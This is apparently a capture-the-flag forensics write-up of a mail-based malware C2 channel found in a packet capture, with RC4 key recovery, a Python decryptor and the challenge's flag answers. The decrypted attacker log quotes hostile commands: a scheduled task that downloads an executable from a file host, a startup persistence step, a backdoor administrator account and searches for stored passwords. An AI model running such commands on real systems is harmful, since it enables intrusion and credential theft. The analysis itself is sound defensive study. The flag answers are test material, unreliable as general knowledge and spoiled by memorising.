# Silent Trap ## Understanding the Setting This forensics challenge was indeed challenging, but definitely fun. We start off with a .pcap file. The first request that struck my eye was a HTTP request to this URL: In the POST body was JSON data that revealed valuable initial information about the captured traffic:

JSON Mail Data

Reading through more of the HTTP requests, it becomes clear that a mail client was used. In Wireshark you can extract files from the data streams at "File > Export Objects > HTTP". I did that to inspect the html files that were transmitted:

HTTP Stream 4.1

HTTP Stream 8.2

From this we already learned a lot about the setting and we even found a password for a file. With the same method as for the html files, I found and extracted the zip file that can be opened with the password just obtained. ``` 7z x 1.zip ``` The result was the executable file "Eldoria\_Balance\_Issue\_Report.pdf.exe". This was likely used to compromise the target. Inspecting the traffic that contains the malicious file, we find that must be the attacker, since he sent the mail with the malware. 192.168.91.133 seems to be the server "mail.korptech.net". An some point it struck my eye that regular "APPEND Inbox" commands were sent via IMAP. They looked like this each time: ``` $ APPEND Inbox {384} From: dev-support Subject: 2/21/2025 5:31:40 PM_report_U1VQUE9SVEhVQl9kZXYtc3VwcG9ydF9NaWNyb3NvZnQgV2luZG93cyBOVCA2LjIuOTIwMC4w VGiPTdHXQGP876EbMX2FJhm3ZazpvA8aO8jT1uC8xPhDZq/Np5oZQnHUpKxc36FHBznusaFRsSPtnJzlC4qyGNxcWMCIs1qdVzygFbDj0se4vntsvpU9rKvQPLcPERIjLB36+ws5PVmzVsnuxNmgUPegSj+VPrRfrcHkaE0PKHVKjXgoGdmRJd2PDG7SWRcBDwNp8EC7UfDTqZp7EDWJYUJuBLfFYh4tpc/MCfKw++nXu5YZ/FWE9pkrWq4= ``` The string could not be decoded and seemed encrypted. In between of these suspicious requests, someone seems to repeatedly search for the mail subject `U1VQUE9SVEhVQl9kZXYtc3VwcG9ydF9NaWNyb3NvZnQgV2luZG93cyBOVCA2LjIuOTIwMC4w` which decodes to "SUPPORTHUB\_dev-support\_Microsoft Windows NT 6.2.9200.0" The suspicious encryted data could be downloaded as described before. The format was eml.

Suspicious EML Data Download

The attacker sent numerous mails with the same subject. Some contact data has been fetched as well:

Mail Contact Data

Inspecting the file in Ghidra and doing a string search, it became clear that the malware seems to have exfiltrated data over mail or served a C2 agent via IMAP. The data is encrypted as we have seen.

Ghidra Strings

## Creating a Decryptor Opening the malware in a Windows VM in ILSpy let me see the actual code, which revealed the encryption function and password for the encrypted data that it sends via IMAP.

ILSpy Malware Inspection

ILSpy Malware Inspection

ILSpy Malware Inspection

The last screenshot shows the encryption password, which was random binary data. I converted it to base64: `qHOu1ajeSCRb0fKARWPDpO62Q1wHeaRWeQpdBIxv+CweXjA2LWS4NhxSybzLlnuj5YqxM6ToVpqzj5AWhgwo8zcCSWdj8+x3CXj3GYSJQ0Jv8GxWVT8sMfEGA6qDljUxfkg8JJD4Nwrx0KPZMZrO4xljEpCGqe1kdRYLlp3mrSZIY4Ee3HDiOBByhRZgAVpIoiaPuiOOgOrE74ayzeV54fbozez+mJFifh3ZSrGOE762l+mdTEpom09zBRLMQf7MdkdcITpwzpdnsxik22JRBvFk5L5gjIABofbsGT5kV5G5LT2PNAjjIOklt2VZGH3L4wmSnNDOwobCF+lkJp46nw==` I also concatenated all of the encrypted strings from the extracted eml files, assuming that the encryptor uses a stream cipher: `bmmDXtPNDyr4vZ8EbWCfVNLNXHGo4IBubIVcntVJYKiokwZ/WoshHv5RlKCKGQA31JqXpPubuF4X`\ `8I3U3VQ/Dc+wzyWDowJLEeOdvWpihEvf10R2qOCVADp4njRKuEqUrJ0FHTfOgYi++463Bjbwl7Kb`\ `WARpwYnOIZKwHU8R6779W7opq8X53gGbtwPHUkL5iLEd3m9wjkyy68bc7OAYcbaLObC5lRH3dHR0`\ `TEJww8wqOT5fikHYuMT/p0mnp0w/uQnrA+nC/G9dFSV+QoF3TGHPyjbCjVFs00kCchwKbuReokfy`\ `0OuAGnlN6A0KUzqlzHEAX6TS3wvnrOf8mOStMMx2nvGIZGmqe6wQoKZSWORO4YjgjYy3VgF7s2nc`\ `Os+lTlCSGPweehEXiNAlWTX6oEARxIi2yHdkmB/L10p3qKuTBCxsmiEF5UrLrJ48ACfRw5W0stu3`\ `Fjt3ZJgf0stMZOSohB0qacoQDvpXlOW9CAE10pyVo7KQswQs6oni214CeMPWwDKTd2SYH9LLTGTk`\ `qIQdKmnKEA76V5TlvQgBNdKclaOykLMELOqJ4tteAnjD1sAyk2tkix/P0Up38e++ORNUyn4MtxyK`\ `7b0PBDvUl8XwvYD2IBrYpsHuDFk6fWieH/2ecyWnvNZdPTmWcQz+UJ7/ug5TdtaSlKPlm6QWfX1o`\ `nh/9nnMlp7zWXT05lnEM/lCe/7oOU3bWkpSj5ZukFn10bp5anoZsP9SahRctarY1D+ETifm+DBwm`\ `0q+moOKwtwY+w7X9100aFaGLwCCSkQFBAPCzoVueDvmJysNJurAY2U5J27uIB9hkcIhUtuvp9bSu`\ `LXy1ojmqvOlrxXJ6bFoYSNTKC3I7UpsQdG6eWp7nFVnqrpUZKmmZDQnlW57poAgaNcqAyaTqgA==` The algorithm used for encryption is RC4, which I found out by asking an LLM about it. Shame on me. I created a Python decrpytor: ```python import base64 from Crypto.Cipher import ARC4 def decode_files(files, base64_passphrase): passphrase = base64.b64decode(base64_passphrase) cipher = ARC4.new(passphrase) for file in files: with open(file, 'r') as f: base64_data = f.read() encrypted_data = base64.b64decode(base64_data) decrypted_data = cipher.decrypt(encrypted_data) print("\n" + decrypted_data.decode('utf-8')) # Example usage file_list = ['0.eml','1.eml','2.eml','3.eml','4.eml','5.eml','6.eml','7.eml','8.eml','9.eml','a.eml','b.eml'] base64_password = 'qHOu1ajeSCRb0fKARWPDpO62Q1wHeaRWeQpdBIxv+CweXjA2LWS4NhxSybzLlnuj5YqxM6ToVpqzj5AWhgwo8zcCSWdj8+x3CXj3GYSJQ0Jv8GxWVT8sMfEGA6qDljUxfkg8JJD4Nwrx0KPZMZrO4xljEpCGqe1kdRYLlp3mrSZIY4Ee3HDiOBByhRZgAVpIoiaPuiOOgOrE74ayzeV54fbozez+mJFifh3ZSrGOE762l+mdTEpom09zBRLMQf7MdkdcITpwzpdnsxik22JRBvFk5L5gjIABofbsGT5kV5G5LT2PNAjjIOklt2VZGH3L4wmSnNDOwobCF+lkJp46nw==' decode_files(file_list, base64_password) ``` ## Results After all we know, we can conclude that the malware is a C2 tool that operates via Mail. The attacker can put an encrypted cmd command in the Drafts folder, the tool waits for that, reads it, decrypts and executes it, and puts the result inthe folder again (RC4 encrypted as well). The decryptor did not work at first, it only decrypted the first command. The reason was, that the extracted mails were the wrong stream. Upon looking at the suspected C2 communication again, this filter could be created to filter out the requests that we can decrypt with the python script: `_ws.col.contains "Request: $ APPEND Inbox"`

Wireshark Filter

The content of the APPEND imap commands contains the commands with their output, after RC4 decoding with the password we extracted from the malware. These are the commands. Note that I removed some of the command output since it was extremely large: {% code overflow="wrap" %} ```powershell C:\Users\dev-support\Desktop>move /Y email.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\email.exe" C:\Users\dev-support\Desktop>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ==================================== ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled C:\Users\dev-support\Desktop>tasklist /v Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title ========================= ======== ================ =========== ============ =============== ================================================== ============ ======================================================================== System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 15:15:22 N/A System 4 Services 0 144 K Unknown N/A 0:02:00 N/A Registry 92 Services 0 42,860 K Unknown N/A C:\Users\dev-support\Desktop>schtasks /create /tn Synchronization /tr "powershell.exe -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri https://www.mediafire.com/view/wlq9mlfrl0nlcuk/rakalam.exe/file -OutFile C:\Temp\rakalam.exe" /sc minute /mo 1 /ru SYSTEM C:\Users\dev-support\Desktop>net user devsupport1 P@ssw0rd /add C:\Users\dev-support\Desktop>net localgroup Administrators devsupport1 /add C:\Users\dev-support\Desktop>net localgroup Administrators devsupport1 /add C:\Users\dev-support\Desktop>reg query HKLM /f "password" /t REG_SZ /s HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fafd998-c8e8-42a1-86d7-7c10c664a415} (Default) REG_SZ Picture Password Enrollment UX C:\Users\dev-support\Desktop>dir C:\ /s /b | findstr "password" C:\Users\dev-support\AppData\Local\BraveSoftware\Brave-Browser\User Data\ZxcvbnData\3\passwords.txt C:\Users\dev-support\Desktop>more "C:\Users\dev-support\AppData\Local\BraveSoftware\Brave-Browser\User Data\ZxcvbnData\3\passwords.txt" 123456 password C:\Users\dev-support\Desktop>more C:\backups\credentials.txt [Database Server] host=db.internal.korptech.net username=dbadmin password=rY?ZY_65P4V0 [Game API] host=api.korptech.net api_key=sk-3498fwe09r8fw3f98fw9832fw [SSH Access] host=dev-build.korptech.net username=devops password=BuildServer@92|7Gy1lz'Xb port=2022 ``` {% endcode %} Now we can see what the attacker did. He enumerated privileges, exfiltrated browser, database, mail passwords and more. At the end, he exfiltrated a secret API key for the game. Now we can answer all questions that were required to solve the challenge: ## Flag Questions **What is the subject of the first email that the victim opened and replied to?** Game Crash on Level 5 - Found by extracting http stream 4 **On what date and time was the suspicious email sent? (Format: YYYY-MM-DD\_HH:MM) (for example: 1945-04-30\_12:34)** 2025-02-24\_15:46 - Found by extracting http stream 8 **What is the MD5 hash of the malware file?** c0b37994963cc0aadd6e78a256c51547 - Extracted the zip file from the http contents, unzipped it with the password from the mail at http stream 8 and used **md5sum Eldoria\_Balance\_Issue\_Report.pdf.exe** **What credentials were used to log into the attacker's mailbox? (Format: username:password)** :completed - Found in an unauthenticated IMAP login when searching for **What is the name of the task scheduled by the attacker?** Synchronisation - This can be found by analyzing the malware, extracting the password and RC4 decrypting all APPEND imap data **What is the API key leaked from the highly valuable file discovered by the attacker?** sk-3498fwe09r8fw3f98fw9832fw --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://shibudocs.gitbook.io/htb-writeups/cyber-apocalypse-2025-tales-from-eldoria/silent-trap.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.